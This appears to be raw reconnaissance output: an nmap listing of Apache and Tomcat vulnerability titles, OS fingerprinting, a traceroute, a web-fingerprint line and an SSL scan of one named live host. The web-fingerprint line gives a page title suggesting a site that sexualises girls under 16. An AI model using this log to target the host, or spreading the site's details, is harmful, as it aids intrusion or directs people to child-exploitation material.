8200| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
8201| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
8202| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
8203| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
8204| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
8205| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
8206| [51151] Apache Roller Search Function q Parameter XSS
8207| [50482] PHP with Apache php_value Order Unspecified Issue
8208| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
8209| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
8210| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
8211| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
8212| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
8213| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
8214| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
8215| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
8216| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
8217| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
8218| [47462] Apache Tomcat HttpServletResponse.sendError Method Message Argument XSS
8219| [47096] Oracle Weblogic Apache Connector POST Request Overflow
8220| [46382] Frontend Filemanager (air_filemanager) Extension for TYPO3 on Apache Unspecified Arbitrary Code Execution
8221| [46285] TYPO3 on Apache Crafted Filename Upload Arbitrary Command Execution
8222| [46085] Apache HTTP Server mod_proxy ap_proxy_http_process_response() Function Interim Response Forwarding Remote DoS
8223| [45905] Apache Tomcat Host Manager host-manager/html/add name Parameter XSS
8224| [45879] Ragnarok Online Control Panel on Apache Crafted Traversal Authentication Bypass
8225| [45742] Apache HTTP Server on Novell Unspecified Request Directive Internal IP Disclosure
8226| [45740] Apache Derby DropSchemaNode Bind Phase Arbitrary Scheme Statement Dropping
8227| [45599] Apache Derby Lock Table Statement Privilege Requirement Bypass Arbitrary Table Lock
8228| [45585] Apache Derby ACCSEC Command RDBNAM Parameter Cleartext Credential Disclosure
8229| [45584] Apache Derby DatabaseMetaData.getURL Function Cleartext Credential Disclosure
8230| [45420] Apache HTTP Server 403 Error Page UTF-7 Encoded XSS
8231| [44728] PHP Toolkit on Gentoo Linux Interpretation Conflict Apache HTTP Server Local DoS
8232| [44618] Oracle JSP Apache/Jserv Path Translation Traversal Arbitrary JSP File Execution
8233| [44159] Apache HTTP Server Remote Virtual Host Name Disclosure
8234| [43997] Apache-SSL ExpandCert() Function Certificate Handling Arbitrary Environment Variables Manipulation
8235| [43994] suPHP for Apache (mod_suphp) Directory Symlink Local Privilege Escalation
8236| [43993] suPHP for Apache (mod_suphp) Owner Mode Race Condition Symlink Local Privilege Escalation
8237| [43663] Apache HTTP Server Mixed Platform AddType Directive Crafted Request PHP Source Disclosure
8238| [43658] AuthCAS Module (AuthCAS.pm) for Apache HTTP Server SESSION_COOKIE_NAME SQL Injection
8239| [43452] Apache Tomcat HTTP Request Smuggling
8240| [43309] Apache Geronimo LoginModule Login Method Bypass
8241| [43290] Apache JSPWiki Entry Page Attachment Unrestricted File Upload
8242| [43259] Apache HTTP Server on Windows mod_proxy_balancer URL Handling Remote Memory Corruption
8243| [43224] Apache Geronimo on SuSE Linux init Script Symlink Unspecified File/Directory Access
8244| [43189] Apache mod_jk2 Host Header Multiple Fields Remote Overflow
8245| [42937] Apache HTTP Server mod_proxy_balancer balancer-manager Unspecified CSRF
8246| [42341] MOD_PLSQL for Apache Unspecified URL SQL Injection
8247| [42340] MOD_PLSQL for Apache CGI Environment Handling Unspecified Overflow
8248| [42214] Apache HTTP Server mod_proxy_ftp UTF-7 Encoded XSS
8249| [42091] Apache Maven Site Plugin Installation Permission Weakness
8250| [42089] Apache Maven .m2/settings.xml Cleartext Password Disclosure
8251| [42088] Apache Maven Defined Repo Process Listing Password Disclosure
8252| [42087] Apache Maven Site Plugin SSH Deployment Permission Setting Weakness
8253| [42036] Apache HTTP Server MS-DOS Device Request Host OS Disclosure
8254| [41891] BEA WebLogic Apache Beehive NetUI Page Flow Unspecified XSS
8255| [41436] Apache Tomcat Native APR Connector Duplicate Request Issue
8256| [41435] Apache Tomcat %5C Cookie Handling Session ID Disclosure
8257| [41434] Apache Tomcat Exception Handling Subsequent Request Information Disclosure
8258| [41400] LimeSurvey save.php Apache Log File PHP Code Injection
8259| [41029] Apache Tomcat Calendar Examples Application cal2.jsp Multiple Parameter CSRF
8260| [41019] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload XSS
8261| [41018] Apache HTTP Server mod_negotiation Module Multi-Line Filename Upload CRLF
8262| [40853] Apache Tomcat SingleSignOn Valve (org.apache.catalina.authenticator.SingleSignOn) JSESSIONIDSSO Cookie Security Weakness
8263| [40264] Apache HTTP Server mod_proxy_balancer balancer_handler Function bb Variable Remote DoS
8264| [40263] Apache HTTP Server mod_proxy_balancer balancer-manager Multiple Parameter XSS
8265| [40262] Apache HTTP Server mod_status refresh XSS
8266| [39833] Apache Tomcat JULI Logging Component catalina.policy Security Bypass
8267| [39251] Coppermine Photo Gallery on Apache Multiple File Extension Upload Arbitrary Code Execution
8268| [39166] Apache Tomcat on Windows caseSensitive Attribute Mixed Case Request JSP Source Disclosure
8269| [39134] Apache mod_imagemap Module Imagemap Unspecified XSS
8270| [39133] Apache mod_imap Module Imagemap File Unspecified XSS
8271| [39035] Apache Tomcat examples/servlet/CookieExample Multiple Parameter XSS
8272| [39003] Apache HTTP Server HTTP Method Header Request Entity Too Large XSS
8273| [39000] Apache Tomcat SendMailServlet sendmail.jsp mailfrom Parameter XSS
8274| [38939] Apache HTTP Server Prefork MPM Module Array Modification Local DoS
8275| [38673] Apache Jakarta Slide WebDAV SYSTEM Request Traversal Arbitrary File Access
8276| [38662] Apache Geronimo SQLLoginModule Nonexistent User Authentication Bypass
8277| [38661] Apache Geronimo MEJB Unspecified Authentication Bypass
8278| [38641] Apache HTTP Server mod_mem_cache recall_headers Function Information Disclosure
8279| [38640] Apache HTTP Server suexec Document Root Unauthorized Operations
8280| [38639] Apache HTTP Server suexec Multiple Symlink Privilege Escalation
8281| [38636] Apache HTTP Server mod_autoindex.c P Variable UTF-7 Charset XSS
8282| [38513] BEA WebLogic Server Proxy Plug-in for Apache Protocol Error Handling Remote DoS
8283| [38187] Apache Geronimo / Tomcat WebDAV XML SYSTEM Tag Arbitrary File Access
8284| [37079] Apache HTTP Server mod_cache cache_util.c Malformed Cache-Control Header DoS
8285| [37071] Apache Tomcat Cookie Handling Session ID Disclosure
8286| [37070] Apache Tomcat Cookie Handling Quote Delimiter Session ID Disclosure
8287| [37052] Apache HTTP Server mod_status mod_status.c Unspecified XSS
8288| [37051] Apache HTTP Server mod_proxy modules/proxy/proxy_util.c Crafted Header Remote DoS
8289| [37050] Apache HTTP Server Prefork MPM Module Crafted Code Sequence Local DoS
8290| [36417] Apache Tomcat Host Manager Servlet html/add Action aliases Parameter XSS
8291| [36377] Apache MyFaces Tomahawk JSF Application autoscroll Multiple Script XSS
8292| [36080] Apache Tomcat JSP Examples Crafted URI XSS
8293| [36079] Apache Tomcat Manager Uploaded Filename XSS
8294| [34888] Apache Tomcat Example Calendar Application cal2.jsp time Parameter XSS
8295| [34887] Apache Tomcat implicit-objects.jsp Crafted Header XSS
8296| [34885] Apache Tomcat on IIS Servlet Engine MS-DOS Device Request DoS
8297| [34884] Apache Tomcat on Windows Nonexistent Resource Request Path Disclosure
8298| [34883] Apache Tomcat Crafted JSP File Request Path Disclosure
8299| [34882] Apache Tomcat Default SSL Ciphersuite Configuration Weakness
8300| [34881] Apache Tomcat Malformed Accept-Language Header XSS
8301| [34880] Apache Tomcat HTTP/1.1 Connector NULL Byte Request JSP Source Disclosure
8302| [34879] Apache Tomcat examples/jsp2/jspx/textRotate.jspx XSS
8303| [34878] Apache Tomcat examples/jsp2/el/implicit-objects.jsp XSS
8304| [34877] Apache Tomcat JK Web Server Connector (mod_jk) Double Encoded Traversal Arbitrary File Access
8305| [34876] Apache HTTP Server ScriptAlias CGI Source Disclosure
8306| [34875] Apache Tomcat appdev/sample/web/hello.jsp Multiple Parameter XSS
8307| [34874] Apache Tomcat AJP Connector mod_jk ajp_process_callback Remote Memory Disclosure
8308| [34873] Apache Stats Variable Extraction _REQUEST Ssuperglobal Array Overwrite
8309| [34872] Apache HTTP Server suexec User/Group Combination Weakness Local Privilege Escalation
8310| [34769] Apache Tomcat w/ Proxy Module Double Encoded Traversal Arbitrary File Access
8311| [34541] mod_perl for Apache HTTP Server RegistryCooker.pm PATH_INFO Crafted URI Remote DoS
8312| [34540] mod_perl for Apache HTTP Server PerlRun.pm PATH_INFO Crafted URI Remote DoS
8313| [34398] Apache Tomcat mod_jk Invalid Chunked Encoded Body Information Disclosure
8314| [34154] Apache Axis Nonexistent Java Web Service Path Disclosure
8315| [33855] Apache Tomcat JK Web Server Connector mod_jk.so Long URI Worker Map Remote Overflow
8316| [33816] Apache HTTP Server on Debian Linux TTY Local Privilege Escalation
8317| [33456] Apache HTTP Server Crafted TCP Connection Range Header DoS
8318| [33346] Avaya Multiple Products Apache Tomcat Port Weakness
8319| [32979] Apache Java Mail Enterprise Server (JAMES) Phoenix/MX4J Interface Arbitrary User Creation
8320| [32978] Apache Java Mail Enterprise Server (JAMES) POP3Server Log File Plaintext Password Disclosure
8321| [32724] Apache mod_python _filter_read Freed Memory Disclosure
8322| [32723] Apache Tomcat semicolon Crafted Filename Request Forced Directory Listing
8323| [32396] Apache Open For Business Project (OFBiz) Ecommerce Component Forum Implementation Message Body XSS
8324| [32395] Apache Open For Business Project (OFBiz) Ecommerce Component Form Field Manipulation Privilege Escalation
8325| [30354] Linux Subversion libapache2-svn Search Path Subversion Local Privilege Escalation
8326| [29603] PHP ini_restore() Apache httpd.conf Options Bypass
8327| [29536] Apache Tcl mod_tcl set_var Function Remote Format String
8328| [28919] Apache Roller Weblogger Blog Comment Multiple Field XSS
8329| [28130] PHP with Apache Mixed Case Method Limit Directive Bypass
8330| [27913] Apache HTTP Server on Windows mod_alias URL Validation Canonicalization CGI Source Disclosure
8331| [27588] Apache HTTP Server mod_rewrite LDAP Protocol URL Handling Overflow
8332| [27487] Apache HTTP Server Crafted Expect Header Cross Domain HTML Injection
8333| [26935] FCKeditor on Apache connector.php Crafted File Extension Arbitrary File Upload
8334| [26572] Apache Java Mail Enterprise Server (JAMES) MAIL Command Overflow DoS
8335| [25909] Drupal on Apache files Directory File Upload Arbitrary Code Execution
8336| [24825] Oracle ModPL/SQL for Apache Unspecified Remote HTTP Issue
8337| [24365] Apache Struts Multiple Function Error Message XSS
8338| [24364] Apache Struts getMultipartRequestHandler() Function Crafted Request DoS
8339| [24363] Apache Struts org.apache.struts.taglib.html.Constants.CANCEL Validation Bypass
8340| [24103] Pubcookie Apache mod_pubcookie Unspecified XSS
8341| [23906] Apache mod_python for Apache HTTP Server FileSession Privileged Local Command Execution
8342| [23905] Apache Log4net LocalSyslogAppender Format String Memory Corruption DoS
8343| [23198] Apache WSS4J Library SOAP Signature Verification Bypass
8344| [23124] Generic Apache Request Library (libapreq) apreq_parse_* Functions Remote DoS
8345| [22652] mod_php for Apache HTTP Server Crafted import_request_variables Function DoS
8346| [22475] PHP w/ Apache PDO::FETCH_CLASS __set() Function DoS
8347| [22473] PHP w/ Apache2 Crafted PDOStatement DoS
8348| [22459] Apache Geronimo Error Page XSS
8349| [22458] Apache Tomcat / Geronimo Sample Script cal2.jsp time Parameter XSS
8350| [22301] auth_ldap for Apache HTTP Server auth_ldap_log_reason() Function Remote Format String
8351| [22261] Apache HTTP Server mod_ssl ssl_hook_Access Error Handling DoS
8352| [22259] mod_auth_pgsql for Apache HTTP Server Log Function Format String
8353| [21736] Apache Java Mail Enterprise Server (JAMES) Spooler retrieve Function DoS
8354| [21705] Apache HTTP Server mod_imap Image Map Referer XSS
8355| [21021] Apache Struts Error Message XSS
8356| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
8357| [20491] PHP mod_php apache2handler SAPI Crafted .htaccess DoS
8358| [20462] Apache HTTP Server worker.c MPM Memory Exhaustion DoS
8359| [20439] Apache Tomcat Directory Listing Saturation DoS
8360| [20373] Apache Tomcat on HP Secure OS for Linux Unspecified Servlet Access Issue
8361| [20285] Apache HTTP Server Log File Control Character Injection
8362| [20242] Apache HTTP Server mod_usertrack Predictable Session ID Generation
8363| [20209] Brainf*ck Module (mod_bf) for Apache HTTP Server Local Overflow
8364| [20033] Apache Tomcat MS-DOS Device Request Error Message Path Disclosure
8365| [19883] apachetop atop.debug Symlink Arbitrary File Overwrite
8366| [19863] mod_auth_shadow for Apache HTTP Server require group Authentication Bypass
8367| [19855] Apache HTTP Server ErrorDocument Directive .htaccess Bypass
8368| [19821] Apache Tomcat Malformed Post Request Information Disclosure
8369| [19769] Apache HTTP Server Double-reverse DNS Lookup Spoofing
8370| [19188] Apache HTTP Server mod_ssl SSLVerifyClient Per-location Context Restriction Bypass
8371| [19137] Apache HTTP Server on Red Hat Linux Double Slash GET Request Forced Directory Listing
8372| [19136] Apache on Mandrake Linux Arbitrary Directory Forced Listing
8373| [18977] Apache HTTP Server Crafted HTTP Range Header DoS
8374| [18389] Ragnarok Online Control Panel Apache Authentication Bypass
8375| [18286] Apache HTTP Server mod_ssl ssl_callback_SSLVerify_CRL( ) Function Overflow
8376| [18233] Apache HTTP Server htdigest user Variable Overfow
8377| [17738] Apache HTTP Server HTTP Request Smuggling
8378| [16586] Apache HTTP Server Win32 GET Overflow DoS
8379| [15889] Apache HTTP Server mod_cgid Threaded MPM CGI Output Misdirection
8380| [14896] mod_dav for Apache HTTP Server Remote Null Dereference Child Process Termination
8381| [14879] Apache HTTP Server ap_log_rerror Function Error Message Path Disclosure
8382| [14770] Apache Tomcat AJP12 Protocol Malformed Packet Remote DoS
8383| [14597] Apache Tomcat IntegerOverflow.jsp Test JSP Script Path Disclosure
8384| [14596] Apache Tomcat pageSession.jsp Test JSP Script Path Disclosure
8385| [14595] Apache Tomcat pageLanguage.jsp Test JSP Script Path Disclosure
8386| [14594] Apache Tomcat pageIsThreadSafe.jsp Test JSP Script Path Disclosure
8387| [14593] Apache Tomcat pageIsErrorPage.jsp Test JSP Script Path Disclosure
8388| [14592] Apache Tomcat pageInvalid.jsp Test JSP Script Path Disclosure
8389| [14591] Apache Tomcat pageExtends.jsp Test JSP Script Path Disclosure
8390| [14590] Apache Tomcat pageDouble.jsp Test JSP Script Path Disclosure
8391| [14589] Apache Tomcat pageAutoFlush.jsp Test JSP Script Path Disclosure
8392| [14588] Apache Tomcat extends2.jsp Test JSP Script Path Disclosure
8393| [14587] Apache Tomcat extends1.jsp Test JSP Script Path Disclosure
8394| [14586] Apache Tomcat comments.jsp Test JSP Script Path Disclosure
8395| [14585] Apache Tomcat buffer4.jsp Test JSP Script Path Disclosure
8396| [14584] Apache Tomcat buffer3.jsp Test JSP Script Path Disclosure
8397| [14583] Apache Tomcat buffer2.jsp Test JSP Script Path Disclosure
8398| [14582] Apache Tomcat buffer1.jsp Test JSP Script Path Disclosure
8399| [14581] Apache Tomcat pageImport2.jsp Test JSP Script Path Disclosure
8400| [14580] Apache Tomcat pageInfo.jsp Test JSP Script Path Disclosure
8401| [14410] mod_frontpage for Apache HTTP Server fpexec Remote Overflow
8402| [14044] Apache Batik Squiggle Browser with Rhino Scripting Engine Unspecified File System Access
8403| [13737] mod_access_referer for Apache HTTP Server Malformed Referer DoS
8404| [13711] Apache mod_python publisher.py Traversal Arbitrary Object Information Disclosure
8405| [13640] mod_auth_any for Apache HTTP Server on Red Hat Linux Metacharacter Command Execution
8406| [13304] Apache Tomcat realPath.jsp Path Disclosure
8407| [13303] Apache Tomcat source.jsp Arbitrary Directory Listing
8408| [13087] Apache HTTP Server mod_log_forensic check_forensic Symlink Arbitrary File Creation / Overwrite
8409| [12849] mod_auth_radius for Apache HTTP Server radcpy() Function Overflow DoS
8410| [12848] Apache HTTP Server htdigest realm Variable Overflow
8411| [12721] Apache Tomcat examples/jsp2/el/functions.jsp XSS
8412| [12720] mod_dosevasive for Apache HTTP Server Symlink Arbitrary File Create/Overwrite
8413| [12558] Apache HTTP Server IPv6 FTP Proxy Socket Failure DoS
8414| [12557] Apache HTTP Server prefork MPM accept Error DoS
8415| [12233] Apache Tomcat MS-DOS Device Name Request DoS
8416| [12232] Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
8417| [12231] Apache Tomcat web.xml Arbitrary File Access
8418| [12193] Apache HTTP Server on Mac OS X File Handler Bypass
8419| [12192] Apache HTTP Server on Mac OS X Unauthorized .ht and .DS_Store File Access
8420| [12178] Apache Jakarta Lucene results.jsp XSS
8421| [12176] mod_digest_apple for Apache HTTP Server on Mac OS X Authentication Replay
8422| [11391] Apache HTTP Server Header Parsing Space Saturation DoS
8423| [11003] Apache HTTP Server mod_include get_tag() Function Local Overflow
8424| [10976] mod_mylo for Apache HTTP Server mylo_log Logging Function HTTP GET Overflow
8425| [10637] Apache HTTP Server mod_ssl SSLCipherSuite Access Restriction Bypass
8426| [10546] Macromedia JRun4 mod_jrun Apache Module Remote Overflow
8427| [10471] Apache Xerces-C++ XML Parser DoS
8428| [10218] Apache HTTP Server Satisfy Directive Access Control Bypass
8429| [10068] Apache HTTP Server htpasswd Local Overflow
8430| [10049] mod_cplusplus For Apache HTTP Server Unspecified Overflow
8431| [9994] Apache HTTP Server apr-util IPV6 Parsing DoS
8432| [9991] Apache HTTP Server ap_resolve_env Environment Variable Local Overflow
8433| [9948] mod_dav for Apache HTTP Server LOCK Request DoS
8434| [9742] Apache HTTP Server mod_ssl char_buffer_read Function Reverse Proxy DoS
8435| [9718] Apache HTTP Server Win32 Single Dot Append Arbitrary File Access
8436| [9717] Apache HTTP Server mod_cookies Cookie Overflow
8437| [9716] Apache::Gallery Gallery.pm Inline::C Predictable Filename Code Execution
8438| [9715] Apache HTTP Server rotatelogs Control Characters Over Pipe DoS
8439| [9714] Apache Authentication Module Threaded MPM DoS
8440| [9713] Apache HTTP Server on OS2 filestat.c Device Name Request DoS
8441| [9712] Apache HTTP Server Multiple Linefeed Request Memory Consumption DoS
8442| [9711] Apache HTTP Server Access Log Terminal Escape Sequence Injection
8443| [9710] Apache HTTP Server on Windows Illegal Character Default Script Mapping Bypass
8444| [9709] Apache HTTP Server on Windows MS-DOS Device Name HTTP Post Code Execution
8445| [9708] Apache HTTP Server on Windows MS-DOS Device Name DoS
8446| [9707] Apache HTTP Server Duplicate MIME Header Saturation DoS
8447| [9706] Apache Web Server Multiple MIME Header Saturation Remote DoS
8448| [9705] Apache Tomcat Invoker/Default Servlet Source Disclosure
8449| [9702] Apache HTTP Server CGI/WebDAV HTTP POST Request Source Disclosure
8450| [9701] Apache HTTP Server for Windows Multiple Slash Forced Directory Listing
8451| [9700] Apache HTTP Server mod_autoindex Multiple Slash Request Forced Directory Listing
8452| [9699] Apache HTTP Server mod_dir Multiple Slash Request Forced Directory Listing
8453| [9698] Apache HTTP Server mod_negotiation Multiple Slash Request Forced Directory Listing
8454| [9697] Apache HTTP Server htdigest Local Symlink Arbitrary File Overwrite
8455| [9696] Apache HTTP Server htpasswd Local Symlink Arbitrary File Overwrite
8456| [9695] Apache Tomcat SnoopServlet Servlet Information Disclosure
8457| [9694] PHP3 on Apache HTTP Server Encoded Traversal Arbitrary File Access
8458| [9693] mod_auth_pgsql_sys for Apache HTTP Server User Name SQL Injection
8459| [9692] Apache HTTP Server mod_vhost_alias Mass Virtual Hosting Arbitrary File Access
8460| [9691] Apache HTTP Server mod_rewrite Mass Virtual Hosting Arbitrary File Access
8461| [9690] Apache HTTP Server mod_vhost_alias CGI Program Source Disclosure
8462| [9689] Trustix httpsd for Apache-SSL Permission Weakness Privilege Escalation
8463| [9688] Apache HTTP Server mod_proxy Malformed FTP Command DoS
8464| [9687] Apache::AuthenSmb smbval SMB Authentication Library Multiple Overflows
8465| [9686] Apache::AuthenSmb smbvalid SMB Authentication Library Multiple Overflows
8466| [9523] Apache HTTP Server mod_ssl Aborted Connection DoS
8467| [9459] Oracle PL/SQL (mod_plsql) Apache Module Help Page Request Remote Overflow
8468| [9208] Apache Tomcat .jsp Encoded Newline XSS
8469| [9204] Apache Tomcat ROOT Application XSS
8470| [9203] Apache Tomcat examples Application XSS
8471| [9068] Apache HTTP Server mod_userdir User Account Information Disclosure
8472| [8773] Apache Tomcat Catalina org.apache.catalina.servlets.DefaultServlet Source Code Disclosure
8473| [8772] Apache Tomcat Catalina org.apache.catalina.connector.http DoS
8474| [7943] Apache HTTP Server mod_ssl sslkeys File Disclosure
8475| [7942] Apache HTTP Server mod_ssl Default Pass Phrase
8476| [7941] Apache HTTP Server mod_ssl Encrypted Private Key File Descriptor Leak
8477| [7935] Apache HTTP Server mod_ssl ssl_gcache Race Conditions
8478| [7934] Apache HTTP Server mod_ssl SSLSessionCache File Content Disclosure
8479| [7933] Apache HTTP Server mod_ssl SSLMutex File Content Disclosure
8480| [7932] Apache HTTP Server mod_ssl mkcert.sh File Creation Permission Weakness
8481| [7931] Apache HTTP Server mod_ssl X.509 Client Certificate Authentication Bypass
8482| [7930] Apache HTTP Server mod_ssl ssl_expr_eval_func_file() Overflow
8483| [7929] Apache HTTP Server mod_ssl ssl_engine_log.c mod_proxy Hook Function Remote Format String
8484| [7611] Apache HTTP Server mod_alias Local Overflow
8485| [7394] Apache Tomcat mod_jk Invalid Transfer-Encoding Chunked Field DoS
8486| [7203] Apache Tomcat source.jsp Traversal Arbitrary File Access
8487| [7039] Apache HTTP Server on Mac OS X HFS+ File System Access Bypass
| [6882] Apache mod_python Malformed Query String Variant DoS
| [6839] Apache HTTP Server mod_proxy Content-Length Overflow
| [6630] Apache Tomcat Java Server Pages (JSP) Engine WPrinterJob() DoS
| [6472] Apache HTTP Server mod_ssl ssl_util_uuencode_binary Remote Overflow
| [5821] Apache HTTP Server Multiple / GET Remote Overflow DoS
| [5580] Apache Tomcat Servlet Malformed URL JSP Source Disclosure
| [5552] Apache HTTP Server split-logfile Arbitrary .log File Overwrite
| [5526] Apache Tomcat Long .JSP URI Path Disclosure
| [5278] Apache Tomcat web.xml Restriction Bypass
| [5051] Apache Tomcat Null Character DoS
| [4973] Apache Tomcat servlet Mapping XSS
| [4650] mod_gzip for Apache HTTP Server Debug Mode Printf Stack Overflow
| [4649] mod_gzip for Apache HTTP Server Debug Mode Format String Overflow
| [4648] mod_gzip for Apache HTTP Server Debug Mode Race Condition
| [4568] mod_survey For Apache ENV Tags SQL Injection
| [4553] Apache HTTP Server ApacheBench Overflow DoS
| [4552] Apache HTTP Server Shared Memory Scoreboard DoS
| [4446] Apache HTTP Server mod_disk_cache Stores Credentials
| [4383] Apache HTTP Server Socket Race Condition DoS
| [4382] Apache HTTP Server Log Entry Terminal Escape Sequence Injection
| [4340] Apache Portable Runtime (APR) apr_psprintf DoS
| [4232] Apache Cocoon DatabaseAuthenticatorAction SQL Injection
| [4231] Apache Cocoon Error Page Server Path Disclosure
| [4182] Apache HTTP Server mod_ssl Plain HTTP Request DoS
| [4181] Apache HTTP Server mod_access IP Address Netmask Rule Bypass
| [4075] Apache HTTP Sever on Windows .var File Request Path Disclosure
| [4037] Apache HTTP Server on Cygwin Encoded GET Request Arbitrary File Access
| [3877] Apache-SSL SSLVerifyClient SSLFakeBasicAuth Client Certificate Forgery
| [3819] Apache HTTP Server mod_digest Cross Realm Credential Replay
| [3322] mod_php for Apache HTTP Server Process Hijack
| [3215] mod_php for Apache HTTP Server File Descriptor Leakage
| [2885] Apache mod_python Malformed Query String DoS
| [2749] Apache Cocoon view-source Sample File Traversal Arbitrary File Access
| [2733] Apache HTTP Server mod_rewrite Local Overflow
| [2672] Apache HTTP Server mod_ssl SSLCipherSuite Ciphersuite Downgrade Weakness
| [2613] Apache HTTP Server mod_cgi stderr Output Handling Local DoS
| [2149] Apache::Gallery Privilege Escalation
| [2107] Apache HTTP Server mod_ssl Host: Header XSS
| [1926] Apache HTTP Server mod_rewrite Crafted URI Rule Bypass
| [1833] Apache HTTP Server Multiple Slash GET Request DoS
| [1577] Apache HTTP Server mod_rewrite RewriteRule Expansion Arbitrary File Access
| [872] Apache Tomcat Multiple Default Accounts
| [862] Apache HTTP Server SSI Error Page XSS
| [859] Apache HTTP Server Win32 Crafted Traversal Arbitrary File Access
| [849] Apache Tomcat TroubleShooter Servlet Information Disclosure
| [845] Apache Tomcat MSDOS Device XSS
| [844] Apache Tomcat Java Servlet Error Page XSS
| [842] Apache HTTP Server mod_ssl ssl_compat_directive Function Overflow
| [838] Apache HTTP Server Chunked Encoding Remote Overflow
| [827] PHP4 for Apache on Windows php.exe Malformed Request Path Disclosure
| [775] Apache mod_python Module Importing Privilege Function Execution
| [769] Apache HTTP Server Win32 DOS Batch File Arbitrary Command Execution
| [756] Apache HTTP Server mod_ssl i2d_SSL_SESSION Function SSL Client Certificate Overflow
| [701] Apache HTTP Server Win32 ScriptAlias php.exe Arbitrary File Access
| [674] Apache Tomcat Nonexistent File Error Message Path Disclosure
| [637] Apache HTTP Server UserDir Directive Username Enumeration
| [623] mod_auth_pgsql for Apache HTTP Server User Name SQL Injection
| [582] Apache HTTP Server Multiviews Feature Arbitrary Directory Listing
| [562] Apache HTTP Server mod_info /server-info Information Disclosure
| [561] Apache Web Servers mod_status /server-status Information Disclosure
| [417] Apache HTTP Server on SuSE Linux /doc/packages Remote Information Disclosure
| [410] mod_perl for Apache HTTP Server /perl/ Directory Listing
| [404] Apache HTTP Server on SuSE Linux WebDAV PROPFIND Arbitrary Directory Listing
| [402] Apache HTTP Server on SuSE Linux cgi-bin-sdb Request Script Source Disclosure
| [379] Apache ASP module Apache::ASP source.asp Example File Arbitrary File Creation
| [377] Apache Tomcat Snoop Servlet Remote Information Disclosure
| [376] Apache Tomcat contextAdmin Arbitrary File Access
| [342] Apache HTTP Server for Windows Multiple Forward Slash Directory Listing
| [222] Apache HTTP Server test-cgi Arbitrary File Access
| [143] Apache HTTP Server printenv.pl Multiple Method CGI XSS
| [48] Apache HTTP Server on Debian /usr/doc Directory Information Disclosure
|_
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|broadband router|WAP|webcam
Running (JUST GUESSING): Linux 2.6.X|3.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
Aggressive OS guesses: Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (94%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 30.016 days (since Fri Sep 6 00:04:24 2019)
Network Distance: 14 hops
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 25.52 ms 10.246.204.1
2 105.61 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
3 30.34 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
4 30.35 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
5 84.82 ms te0-7-0-2.rcr21.ymq02.atlas.cogentco.com (38.122.42.161)
6 84.83 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
7 121.31 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
8 121.33 ms be2182.ccr41.ams03.atlas.cogentco.com (154.54.77.245)
9 121.35 ms be3433.rcr21.ams06.atlas.cogentco.com (154.54.58.202)
10 138.71 ms worldstream.demarc.cogentco.com (149.11.39.90)
11 138.71 ms 109.236.95.181
12 138.70 ms 190.2.158.153
13 138.74 ms 185.106.120.66
14 102.93 ms latina.petite.guru (185.82.200.52)

NSE: Script Post-scanning.
Initiating NSE at 00:27
Completed NSE at 00:27, 0.00s elapsed
Initiating NSE at 00:27
Completed NSE at 00:27, 0.00s elapsed
######################################################################################################################################
8594https://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
######################################################################################################################################
Version: 1.11.13-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 185.82.200.52

Testing SSL server www.ygmt.info on port 443 using SNI name www.ygmt.info

 TLS Fallback SCSV:
Server supports TLS Fallback SCSV

 TLS renegotiation:
Secure session renegotiation supported

 TLS Compression:
Compression disabled

 Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

 Supported Server Cipher(s):
Preferred TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
